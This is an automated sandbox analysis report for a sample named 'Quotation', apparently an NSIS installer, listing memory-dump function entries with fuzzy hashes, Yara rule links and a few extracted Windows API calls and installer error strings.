Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0858fa82a42bd8307eb769e72d13ec4eef0933e5c9771d17f91d162e8cf8b862
Instruction ID: 202eff336f1655145199d794c51e603b8b8ca705a7d353bde14cee3c2dd0a1a7
Opcode Fuzzy Hash: 0858fa82a42bd8307eb769e72d13ec4eef0933e5c9771d17f91d162e8cf8b862
Instruction Fuzzy Hash: EC21A1306002407BEF215768DD4836D3765E79B326F08097BE406EB794DF299CA6C792

Function 0016A080 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db6b2a6ec2853561bdac1d4cb0dcdb3f9e8efff544bbf870acfb2b988c7422b8
Instruction ID: 870265b8497d248b02689311400bf59d3953a836cea04b21291f7a02fe85b16d
Opcode Fuzzy Hash: db6b2a6ec2853561bdac1d4cb0dcdb3f9e8efff544bbf870acfb2b988c7422b8
Instruction Fuzzy Hash: A5217E70E0021A9BDB05CF69C95069EF7B2BF8A300F54C629E805BB351DB71AC92CB91

Function 0016FD80 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71430be04421408d1ccb4784500226fbd17feeac9062c205b4e3d5032ac2478f
Instruction ID: b17504fe89c7cdea51aa2b2454b4cc8567efc581dc170556d17d1a15506d4fbf
Opcode Fuzzy Hash: 71430be04421408d1ccb4784500226fbd17feeac9062c205b4e3d5032ac2478f
Instruction Fuzzy Hash: 0F217E3070025ABBDB14DF69DA4067A7BE6AB5C788F004129C809E7365FB36DD27CB81

Function 3B143B58 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3006bee9a1910e4f1a4e263b5fab43719208e4be238bf1aaf3a4b2304b690fe6
Instruction ID: ae087e693e4afaa74669bfa9601f20db26fe4d3ca8627a66e22b65dd91e2c249
Opcode Fuzzy Hash: 3006bee9a1910e4f1a4e263b5fab43719208e4be238bf1aaf3a4b2304b690fe6
Instruction Fuzzy Hash: 8A216B75F002199FEB00CFA9D940A9EBBF6EB8C650F50842AE945F7390E730D9418B90

Function 001617C0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a20c1fd13aa58054152df935e5edf6b75946487571a5588b118768c37449675f
Instruction ID: af931bd1c2ace8ec86128b00991c8f369c93305fca2ebe70d90bbb2e952ed85b
Opcode Fuzzy Hash: a20c1fd13aa58054152df935e5edf6b75946487571a5588b118768c37449675f
Instruction Fuzzy Hash: 66212736B00295AFCB119BBC9C0865EBBF9FF8D320B18046AE805D7651EB348C52C791

Function 00161888 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c11392d5c31f9b946e181dc8d47a1cac6a18f5e039b6c944f3c250a770aa8c7
Instruction ID: 9df37655524e8826285e1bacbf9bbf4afa16f685fdfbfcf1ad2fb21a4be0b3df
Opcode Fuzzy Hash: 4c11392d5c31f9b946e181dc8d47a1cac6a18f5e039b6c944f3c250a770aa8c7
Instruction Fuzzy Hash: A3213630B00249EFDB18EB68C9657AE77F6AB49305F240468D506FB290DB369D51CBA1

Function 00169F80 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d1121a5a944dbd3ebe34317ad6a2148921ed201cb253b7e1755ee6ca9a5691
Instruction ID: 3d658f405e36a13220899e04055815a923508ce0775cad0fbd73b7f6d0927a44
Opcode Fuzzy Hash: 75d1121a5a944dbd3ebe34317ad6a2148921ed201cb253b7e1755ee6ca9a5691
Instruction Fuzzy Hash: 38214F31E0061A9BDB18CFA4D9545DEB7B6BF89310F21852AF815FB390EB70AC46CB51

Function 001616B0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f485b4ae017b2f632cb748bf04d7c8153a3e63666dc77039ca05f659f279734
Instruction ID: e48c3a62b6bd9e0fe3c5e1414b486e56d7fafe8f08098f3667b686256cacfed7
Opcode Fuzzy Hash: 8f485b4ae017b2f632cb748bf04d7c8153a3e63666dc77039ca05f659f279734
Instruction Fuzzy Hash: BB21A5746001597FDF50DB38DD8471A3796EB5D711F144A29E00AEB66DEB34DCA38B80

Function 3B143C68 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee8a456d0261cd21a4c2ae645d96c064c5b275b92d431168d946703b572bb0d
Instruction ID: 6294c8e26b15be88f7adb5055759f4f5489e70d8b244fde6ba12259336aa3010
Opcode Fuzzy Hash: 4ee8a456d0261cd21a4c2ae645d96c064c5b275b92d431168d946703b572bb0d
Instruction Fuzzy Hash: 5E11A135B001299BEB449678C91469F77FAABCD712B50443AD80AE7384DE34DD028BD1

Function 3B143921 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0973b6a6b80c0e2a77eec2722d500e3c8c6442797221c2482474c321fc19fb7f
Instruction ID: af4d66f6cb23588af85d5edddef3168f98516313778bc6285d3a542c4128e6df
Opcode Fuzzy Hash: 0973b6a6b80c0e2a77eec2722d500e3c8c6442797221c2482474c321fc19fb7f
Instruction Fuzzy Hash: 5121F4B1D01359AFCB00DF9AD884ADEFFB4FB48320F50822AE918A7340C374A554CBA5

Function 3B1442AA Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 527e1cd3d0d7d0607368ae7cb321d8aca49e40777c7fef628049d4d9b38b532f
Instruction ID: fc6e58632309c68926c51d1356b3b11759e27e9b5d1de68de76eb072a7acc508
Opcode Fuzzy Hash: 527e1cd3d0d7d0607368ae7cb321d8aca49e40777c7fef628049d4d9b38b532f
Instruction Fuzzy Hash: 8301D479B042241FEB11A2BDD421B4B7BEADBCAB61F10C83AF00AC7355DE65DD424395

Function 00161493 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc6b8e01e177bc389e5498737e0fa21ff930b2399d13003c584b792979d80359
Instruction ID: 23b57999990cf47d06c66a946257dbbcbdb2d158281658608488769db52453a1
Opcode Fuzzy Hash: dc6b8e01e177bc389e5498737e0fa21ff930b2399d13003c584b792979d80359
Instruction Fuzzy Hash: BB112131E012159FCB26EFB888511AEB7F5EF49311B1504B9E806E7301EB35DD528BE5

Function 3B143C57 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4af6d1cea7f4f85cbdbbe56896623da435e039dd5abd511e3074284c54d53fdb
Instruction ID: 0d252e4f7143a52328054e8b7505e35d259e4b798e2202caa2b6285e064cee9c
Opcode Fuzzy Hash: 4af6d1cea7f4f85cbdbbe56896623da435e039dd5abd511e3074284c54d53fdb
Instruction Fuzzy Hash: B8012436B000595BEB4496B9D8106EF7BBBDBCDA12F00403AD409E3284EF358E0387D2

Function 00161498 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca2e5b8c0ea59d561b1a8fbd3a40683ac9939add0e607625cfb0519ba44b593a
Instruction ID: 7accf7489544147e79187ee604774619d860d64b208bc7ea8d168b6c81c773d7
Opcode Fuzzy Hash: ca2e5b8c0ea59d561b1a8fbd3a40683ac9939add0e607625cfb0519ba44b593a
Instruction Fuzzy Hash: 04014431E012149FCB25EFB8885119EB7F5EF49311B1504B9D406E7301EB35D9518BD5

Function 3B14EE31 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f0a4347f5a09047b3d1d942622f1c5ac42c272dffd39639aebf438c1230c65
Instruction ID: 049bdf21077d8a9ce05c6cfdedbb25a4f77d6e7a6006de2d60d8b578dd4e1bb2
Opcode Fuzzy Hash: 90f0a4347f5a09047b3d1d942622f1c5ac42c272dffd39639aebf438c1230c65
Instruction Fuzzy Hash: 8701BC36B000145FEB69CA3CC690A2E77F2EBCAB11B148839E00ADB745DB25DC428781

Function 3B143928 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b027019ebec1f01cd9d6a99944582eb5b2c271c89cb10d0f36a891266d0c187
Instruction ID: 36aa649fdaad9f585f6685857549620005e614509704d99662fba6110d24ce62
Opcode Fuzzy Hash: 0b027019ebec1f01cd9d6a99944582eb5b2c271c89cb10d0f36a891266d0c187
Instruction Fuzzy Hash: E211B3B5D01259AFCB00DF9AD984ADEFFB4FB49310F50812AE918A7340C3746554CBA5

Function 3B14A399 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f76485225994ae3fa1eaa22a55f63f6b18cc19a77dcf85851b0bbf2d1242fc49
Instruction ID: 402559ddfc51710716880c5ba43fdb053131e71967959af7a3995327e2fcefab
Opcode Fuzzy Hash: f76485225994ae3fa1eaa22a55f63f6b18cc19a77dcf85851b0bbf2d1242fc49
Instruction Fuzzy Hash: 3D01BC34B101545FEB11D738C56265E77E2EB8AB21F158829E10ADB385EA31DC028BD1

Function 3B1442B8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5922e20c70541d78d6a9ce9292da68de1d9d1b4dbbf2aeb7a3237aeadc4f9d3e
Instruction ID: e4b7c64a47b6461984ac97b2add980f6e8c39d018a57a455971ad5f6c4afb117
Opcode Fuzzy Hash: 5922e20c70541d78d6a9ce9292da68de1d9d1b4dbbf2aeb7a3237aeadc4f9d3e
Instruction Fuzzy Hash: 3F01DC39B000241BEB10A6BED411B4FB2EADBC9B21F20883AF00AC7344DE65DC424394

Function 3B14EE40 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb098f2c8fda7ef28190b48a1e56f65884a4a97aa9233e2379771f9a8874677
Instruction ID: 52db005d2f3f722b8b28486b433f0b736d8a60cacdc7966dd6d94978678f9663
Opcode Fuzzy Hash: 9eb098f2c8fda7ef28190b48a1e56f65884a4a97aa9233e2379771f9a8874677
Instruction Fuzzy Hash: AD018C36B000181FEB68967DC650B2F73E6EBCAA61F148839F10AE7745DA25DC0243D5

Function 3B14A3A8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 481b39b1926b9bb3159a5d36a16615d8afcf82c2204377e9ead9f6504b6d3384
Instruction ID: 7af06a6bb285c4e116a90bcbca6b6709db543300472535f4770b3f3393a349b0
Opcode Fuzzy Hash: 481b39b1926b9bb3159a5d36a16615d8afcf82c2204377e9ead9f6504b6d3384
Instruction Fuzzy Hash: 1A016D34B101155FE754962CC56670E73E6E78AB61F108829F50AD7345EA31DC4247D0

Function 0016F2F0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac2d88b9d05f1f05ab7705cec7b5ab16fdcb3864b6184690c1d2568bf3f43a1
Instruction ID: d3031df5c970b0d8d4517e01dd0ad1ff08939b9784b2e0d3df5b724a64c44fae
Opcode Fuzzy Hash: 3ac2d88b9d05f1f05ab7705cec7b5ab16fdcb3864b6184690c1d2568bf3f43a1
Instruction Fuzzy Hash: 57F0A0A135020467D7082A7E5924B7B3A9EFFCA796B25483AE206E7281EF509C0353E1

Function 00167EB0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af53c81aa95341245a8d61e8946c464aced1024bfb3b0f5dd9d2a5a7546ea6d1
Instruction ID: 7e8999847d0fdde44a90250e6e5604970a665c63b321e89933279ddf5b3935ad
Opcode Fuzzy Hash: af53c81aa95341245a8d61e8946c464aced1024bfb3b0f5dd9d2a5a7546ea6d1
Instruction Fuzzy Hash: D2F0C935740108DFD704DB78D958A6C77B2EF88315F5040A8E5069B7B4DB35AD42CB41

Function 0016F8BB Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9230a671acc73efed541484029e041f0ce61f2e24c268f1287125607d0dc6b2
Instruction ID: d5cd26db8865e4cf27a01c59710bd20817b17b7f4c9e7cd53a9856c06b4e742c
Opcode Fuzzy Hash: c9230a671acc73efed541484029e041f0ce61f2e24c268f1287125607d0dc6b2
Instruction Fuzzy Hash: 7EE02B6134010027D7082A6D9410F7F369FBFC6751B214436E505D7384EF608D0243E1

Function 3B146519 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b544d4bbf389c5d86d6fb392dbf19803e77ba2cac7866b9d4d471edba6741e14
Instruction ID: bf489e01905a6c025784bd0b0b3f4b495ea5ebd7eec3940643caf9f6f42eb795
Opcode Fuzzy Hash: b544d4bbf389c5d86d6fb392dbf19803e77ba2cac7866b9d4d471edba6741e14
Instruction Fuzzy Hash: EBE04F72E25249ABEB00CA70C90578B7FBDE70369DF6149F6D404DF141E376CA068780

Function 0016F879 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a1b00f07a7ff1e4de75bceb5d33c02595bd92b09d9180ba54213a1ea07a5b0
Instruction ID: 38f68aa9efac7c52421ca32c67cc3c8af56f0469c8e639c5565a10279e4c7efc
Opcode Fuzzy Hash: c3a1b00f07a7ff1e4de75bceb5d33c02595bd92b09d9180ba54213a1ea07a5b0
Instruction Fuzzy Hash: F0E086213582A05FCB02937C68215D43FF95F8B61035C01FAE444DF263CE055C1957D1

Function 0016E6E8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4771436fdce1d826675447c3dd73473ee3a0ff4f3ef7bcd6a06c9d59b1f11e28
Instruction ID: adce055d6470dcb49b92df07d45a0806ffa819bd687ce07e08d68f6dd679ea28
Opcode Fuzzy Hash: 4771436fdce1d826675447c3dd73473ee3a0ff4f3ef7bcd6a06c9d59b1f11e28
Instruction Fuzzy Hash: B2D095216083081FD3259F6D6C147A53BDE6705355F494175F509CF281D7449C1543D4

Function 0016EBAC Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f966f20b72e2e8ad4e1f97ccbf8c4e8d67fd115778ce84ee3e40bfc99c04613
Instruction ID: 319b054686659e5d4ef5d56775c3ad4281ad424680cbcdf2e7054c47b4cafd8f
Opcode Fuzzy Hash: 9f966f20b72e2e8ad4e1f97ccbf8c4e8d67fd115778ce84ee3e40bfc99c04613
Instruction Fuzzy Hash: 34D05E713A40246B4608B26CB8618A936E9EFDA71536149BFF409D7352DE519C011785

Function 0016E6F8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06adb66dc0063d3c6184c7d42f5c38cf23e12a3e82c4eb9b856bdecde1cc625f
Instruction ID: 46c7d6773a826484f4d7da931b01ebb331ca60e1248e6665e31f163346afda1c
Opcode Fuzzy Hash: 06adb66dc0063d3c6184c7d42f5c38cf23e12a3e82c4eb9b856bdecde1cc625f
Instruction Fuzzy Hash: 7DD0A738605714DBC334DB6ED508693B7DABB49715B894519E04783B40C760FC118BC4

Function 00166C0C Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2924301679.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a5c84a876baccbe6d06550c11bddef624980fe578e409af2b2b55962569720c
Instruction ID: 3df99ddae20aa2f2221a1654702273f51b37acf5c12adee8a3afefbe6b12213c
Opcode Fuzzy Hash: 1a5c84a876baccbe6d06550c11bddef624980fe578e409af2b2b55962569720c
Instruction Fuzzy Hash: 8EC0123A3080908F8A02A728E0A44B837B1DBCA22932400EAE148CB322CF229812DB00

Non-executed Functions

Function 3B147740 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$dq, xrefs: 3B147CF2
$dq, xrefs: 3B1478A5
$dq, xrefs: 3B147C31
$dq, xrefs: 3B147880
$dq, xrefs: 3B147CDC
$dq, xrefs: 3B147874
$dq, xrefs: 3B147CD0
$dq, xrefs: 3B1478B1
$dq, xrefs: 3B147C3D
$dq, xrefs: 3B147CE6

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-3623093008
Opcode ID: f0afeec1498f721cd49ec0daf3d538f1b47a5d0d65878c50f630c455e83a8ed8
Instruction ID: 07b1f3b4e8a0301e77c5962abed9e6641baa4d942723322cbf67b079ea015bb8
Opcode Fuzzy Hash: f0afeec1498f721cd49ec0daf3d538f1b47a5d0d65878c50f630c455e83a8ed8
Instruction Fuzzy Hash: 58123B75E0121ACFDB14DF69C950A9EB7F2BF88301F2095A9D409AB3A5DB309D85CF80

Function 004036DA Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008001), ref: 004036F6
GetVersionExW.KERNEL32(?), ref: 0040371F

Strings

NSIS Error, xrefs: 00403840
UXTHEME, xrefs: 004037CE, 004037D3, 004037D9
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004036E6

Memory Dump Source

Source File: 00000004.00000002.2924402104.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2924385227.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2924420597.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2924438748.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2924550776.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quotation.jbxd

Similarity

API ID: ErrorModeVersion
String ID: Error writing temporary file. Make sure your temp folder is valid.$NSIS Error$UXTHEME
API String ID: 3050056751-1170945346
Opcode ID: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
Instruction ID: 04f03ee53333af138268126fb18566c4da9f6100b8f71d1fbc27ece8fdb1561f
Opcode Fuzzy Hash: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
Instruction Fuzzy Hash: CF3104B0504350AFD310AF659D95BBB3AE8EB85305F40443FF8C6BB2C1DA7C89448B6A

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
wsprintfW.USER32 ref: 004061CF
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

\, xrefs: 004061A4
UXTHEME, xrefs: 0040618B
%s%S.dll, xrefs: 004061C9

Memory Dump Source

Source File: 00000004.00000002.2924402104.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2924385227.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2924420597.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2924438748.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2924550776.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_Quotation.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

Function 3B14A9C8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$dq, xrefs: 3B14AABE
$dq, xrefs: 3B14AB19
$dq, xrefs: 3B14AB50
$dq, xrefs: 3B14AB25
$dq, xrefs: 3B14AB86
$dq, xrefs: 3B14AB7A
$dq, xrefs: 3B14AACA
$dq, xrefs: 3B14AB44

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-634254105
Opcode ID: e77e0244398c649273338d443ddc79309a4857eee94a5fb76775c08f4dc1368d
Instruction ID: 1f7348d9141753a27770543cbd66d371decbb191eddb705630a38907c826592a
Opcode Fuzzy Hash: e77e0244398c649273338d443ddc79309a4857eee94a5fb76775c08f4dc1368d
Instruction Fuzzy Hash: 43918074A20309DFEB14DF64C956BAF77F2BF88346F218429E805AB290DB749D41CB91

Function 3B147140 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$dq, xrefs: 3B147654
.5|q, xrefs: 3B14719B
$dq, xrefs: 3B147648
$dq, xrefs: 3B147422
$dq, xrefs: 3B14747C
$dq, xrefs: 3B1475DC
$dq, xrefs: 3B147488

Memory Dump Source

Source File: 00000004.00000002.2952343183.000000003B140000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3b140000_Quotation.jbxd

Similarity

API ID:
String ID: .5|q$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-3447281907
Opcode ID: d1c4850756a452fec1a8f65a345e9e450c8b5776035409f12e3d84377346ad6b
Instruction ID: 6b64067d2f255427ca68ba34223a00c7c1f5ebf1d35c378ab2c45042c84275e0
Opcode Fuzzy Hash: d1c4850756a452fec1a8f65a345e9e450c8b5776035409f12e3d84377346ad6b
Instruction Fuzzy Hash: D0F13C74B00249DFEB05DFA8C954A5EBBB3FF89301F248568D845AB395DB35AC52CB40

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

